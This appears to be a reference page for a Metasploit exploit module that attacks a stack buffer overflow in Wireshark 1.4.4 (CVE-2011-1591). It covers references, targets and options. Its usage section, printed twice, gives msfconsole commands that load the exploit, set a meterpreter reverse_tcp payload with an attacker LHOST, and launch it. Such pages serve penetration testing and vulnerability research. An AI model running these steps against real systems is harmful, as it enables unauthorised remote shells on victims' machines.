Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow (remote)
This module exploits a stack buffer overflow in Wireshark <= 1.4.4 by sending an malicious packet.)
Exploit Rank
- Good
Exploit Authors
- Paul Makowski < >
- sickness < >
- corelanc0d3r < peter.ve [at] corelan.be >
Vulnerability References
- CVE-2011-1591
- OSVDB-71848
- https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838
- https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836
- EDB-17185
Exploit Targets
- 0 - Win32 Universal (Generic DEP & ASLR Bypass) (default)
Exploit Development
Similar Exploit Modules
- exploit/windows/misc/agentxpp_receive_agentx
- exploit/windows/misc/apple_quicktime_rtsp_response
- exploit/windows/misc/asus_dpcproxy_overflow
- exploit/windows/misc/avidphoneticindexer
- exploit/windows/misc/bakbone_netvault_heap
- exploit/windows/misc/bcaaa_bof
- exploit/windows/misc/bigant_server
- exploit/windows/misc/bigant_server_250
- exploit/windows/misc/bigant_server_usv
- exploit/windows/misc/bomberclone_overflow
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/misc/wireshark_packet_dect
msf exploit(wireshark_packet_dect) > show payloads
msf exploit(wireshark_packet_dect) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(wireshark_packet_dect) > set LHOST [MY IP ADDRESS]
msf exploit(wireshark_packet_dect) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/misc/wireshark_packet_dect
msf exploit(wireshark_packet_dect) > show payloads
msf exploit(wireshark_packet_dect) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(wireshark_packet_dect) > set LHOST [MY IP ADDRESS]
msf exploit(wireshark_packet_dect) > exploit
Exploit Module Options
| DELAY | This option sets the delay between sent packets (default: 5) |
| INTERFACE | The name of the interface |
| LOOP | Send the packet every X seconds until the job is killed |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| ExitOnSession | Return from the exploit after a session has been created |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
